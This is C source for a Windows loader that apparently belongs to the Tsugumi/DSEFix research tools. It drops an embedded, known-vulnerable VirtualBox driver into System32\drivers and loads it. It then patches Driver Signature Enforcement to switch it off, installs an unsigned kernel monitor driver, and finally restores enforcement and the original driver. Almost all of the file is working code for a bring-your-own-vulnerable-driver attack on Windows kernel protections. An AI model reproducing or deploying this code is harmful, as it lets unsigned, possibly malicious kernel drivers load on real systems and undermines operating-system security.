void UnloadVulnerableDriver( VOID ) { SC_HANDLE schSCManager; // // If there is no VBox installed simple remove driver. // if (g_VBoxInstalled != TRUE) { scmUnloadDeviceDriver(VBoxDrvSvc); } // // VBox was installed, stop our and restore actual driver. // else { // // Stop our VBoxDrv service. // schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS ); if (schSCManager) { scmStopDriver(schSCManager, VBoxDrvSvc); CloseServiceHandle(schSCManager); } // // Restore saved backup. // supBackupVBoxDrv(TRUE); } }
HANDLE LoadVulnerableDriver( VOID ) { HANDLE hFile; HANDLE hDevice; DWORD bytesIO; WCHAR szDriverBuffer[BUFFER_SIZE]; // // Combine full path name for our driver. // RtlSecureZeroMemory(szDriverBuffer, BUFFER_SIZE); if (!GetSystemDirectory(szDriverBuffer, MAX_PATH)) { return NULL; } _strcat(szDriverBuffer, TEXT("\\drivers\\VBoxDrv.sys")); // // Backup vboxdrv if exists. // g_VBoxInstalled = supBackupVBoxDrv(FALSE); // // Drop our driver file to the disk. // hFile = CreateFile(szDriverBuffer, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); if (hFile == INVALID_HANDLE_VALUE) { return NULL; } bytesIO = 0; WriteFile(hFile, VBoxDrv, sizeof(VBoxDrv), &bytesIO, NULL); CloseHandle(hFile); // // Check if file dropped OK. // if (bytesIO != sizeof(VBoxDrv)) { return NULL; } // // Open device handle. // hDevice = NULL; if (!scmLoadDeviceDriver(VBoxDrvSvc, szDriverBuffer, &hDevice)) { return NULL; } // // Driver file is no longer needed. // DeleteFile(szDriverBuffer); return hDevice; }
/* * ldrMain * * Purpose: * * Program entry point. * */ void ldrMain( VOID ) { BOOL cond = FALSE; LONG x; ULONG l = 0, dwCmd; HANDLE hDevice; PVOID DataBuffer; BOOL bConDisabled, bUsbMonDisabled; WCHAR cmdLineParam[MAX_PATH + 1]; WCHAR szDriverBuffer[MAX_PATH * 2]; __security_init_cookie(); bConDisabled = FALSE; bUsbMonDisabled = FALSE; DataBuffer = NULL; hDevice = NULL; dwCmd = 0; do { // // Check OS version. // RtlSecureZeroMemory(&g_osv, sizeof(g_osv)); g_osv.dwOSVersionInfoSize = sizeof(g_osv); RtlGetVersion((PRTL_OSVERSIONINFOW)&g_osv); // // We support only Vista based OS. // if (g_osv.dwMajorVersion < 6) { MessageBox(GetDesktopWindow(), TEXT("Unsupported OS."), T_PROGRAMTITLE, MB_ICONINFORMATION); break; } // // Check number of instances running. // x = InterlockedIncrement((PLONG)&g_lApplicationInstances); if (x > 1) { break; } // // Check if any VBox instances are running, they must be closed before our usage. // if (supProcessExist(L"VirtualBox.exe")) { MessageBox(GetDesktopWindow(), TEXT("VirtualBox is running, close it before."), T_PROGRAMTITLE, MB_ICONINFORMATION); break; } // // Query command line. // RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam)); GetCommandLineParam(GetCommandLine(), 1, cmdLineParam, MAX_PATH, &l); if (l == 0) { // // Nothing in command line, simple display help and leave. // MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION); break; } // // Check known command. // if (_strcmpi(cmdLineParam, TEXT("-l")) == 0) { dwCmd = TSMI_INSTALL; } else { if (_strcmpi(cmdLineParam, TEXT("-u")) == 0) { dwCmd = TSMI_REMOVE; } } if (dwCmd == 0) { MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION); break; } // // Init ldr and DSEFix. // if (!ldrInit(dwCmd)) { break; } // // Process command. // switch (dwCmd) { case TSMI_INSTALL: // Backup vboxdrv if exists. supBackupVBoxDrv(FALSE); // Stop VBox Networking and USB driver. bConDisabled = (SUCCEEDED(supNetworkConnectionEnable(VBoxNetConnect, FALSE))); bUsbMonDisabled = dsfStopDriver(VBoxUsbMon); dsfStopDriver(VBoxDrvSvc); // Load vulnerable VBoxDrv, disable VBox Network if exist. RtlSecureZeroMemory(szDriverBuffer, sizeof(szDriverBuffer)); if (GetSystemDirectory(szDriverBuffer, MAX_PATH) == 0) { MessageBox(GetDesktopWindow(), TEXT("Cannot find System32 directory."), NULL, MB_ICONINFORMATION); break; } _strcat(szDriverBuffer, TEXT("\\drivers\\VBoxDrv.sys")); hDevice = dsfLoadVulnerableDriver(szDriverBuffer); if (hDevice) { // // Disable DSE so we can load monitor. // Device handle closed by DSEFix routine. // if (ldrPatchDSE(hDevice, TRUE)) { // Stop our VBoxDrv, need reloading for 2nd usage. dsfStopDriver(VBoxDrvSvc); // Load custom patch table, if present. RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam)); GetCommandLineParam(GetCommandLine(), 2, cmdLineParam, MAX_PATH, &l); if (l > 0) { l = 0; DataBuffer = ldrFetchCustomPatchData(cmdLineParam, &l); if ((DataBuffer != NULL) && (l > 0)) { g_TsmiPatchDataValue = DataBuffer; g_TsmiPatchDataValueSize = l; } } // Install and run monitor. if (!ldrSetMonitor()) { MessageBox(GetDesktopWindow(), TEXT("Error loading Tsugumi"), NULL, MB_ICONERROR); } // Enable DSE back. hDevice = NULL; if (dsfStartDriver(VBoxDrvSvc, &hDevice)) { ldrPatchDSE(hDevice, FALSE); } } else { //ldrPatchDSE failure case // Unknown error during DSE disabling attempt. MessageBox(GetDesktopWindow(), TEXT("Error disabling DSE"), NULL, MB_ICONERROR); } // Finally, remove our vboxdrv file and restore backup. dsfStopDriver(VBoxDrvSvc); DeleteFile(szDriverBuffer); supBackupVBoxDrv(TRUE); // Restart installed VBoxDrv. dsfStartDriver(VBoxDrvSvc, NULL); } else { //dsfLoadVulnerableDriver failure case. // Load error, show error message and restore backup. supBackupVBoxDrv(TRUE); MessageBox(GetDesktopWindow(), TEXT("Error loading VBoxDrv"), NULL, MB_ICONERROR); } break; // // Remove command, unload our driver and purge file/memory list cache. // case TSMI_REMOVE: scmUnloadDeviceDriver(TsmiDrvName); supPurgeSystemCache(); break; } } while (cond); // // Cleanup after install. // if (dwCmd == TSMI_INSTALL) { // Re-enable VBox Network, UsbMonitor if they're disabled. if (bConDisabled) { supNetworkConnectionEnable(VBoxNetConnect, TRUE); } if (bUsbMonDisabled) { dsfStartDriver(VBoxUsbMon, NULL); } // Free memory allocated for custom patch table. if (DataBuffer != NULL) { HeapFree(GetProcessHeap(), 0, DataBuffer); } } InterlockedDecrement((PLONG)&g_lApplicationInstances); ExitProcess(0); return; }